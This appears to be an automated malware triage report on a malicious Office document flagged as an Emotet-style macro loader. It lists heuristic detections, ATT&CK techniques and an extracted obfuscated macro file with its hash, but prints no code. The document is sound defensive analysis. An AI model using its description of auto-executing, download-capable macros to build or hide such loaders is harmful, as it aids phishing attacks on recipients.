Verdict: MALICIOUS
Risk Score: 244

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and exhibits multiple high-severity heuristic firings related to VBA macros, including AutoOpen and CreateObject calls. The presence of a VBA macro in 'macros.bas' suggests an attempt to execute code. While the macro code is heavily obfuscated, the heuristics indicate it is designed to auto-execute and create objects, a common pattern for downloading and running further malicious content. The file is likely delivered as a spearphishing attachment.
Heuristics (9)
- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 63498 bytes |

SHA-256: 98a68c966e29e8c2983cdf41b6a1a88a7340c74c623101ffd014280803694918

Detection (carved artifact):
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 26 long base64-like blob(s))

Preview script: first 1,000 lines of the extracted script (truncated)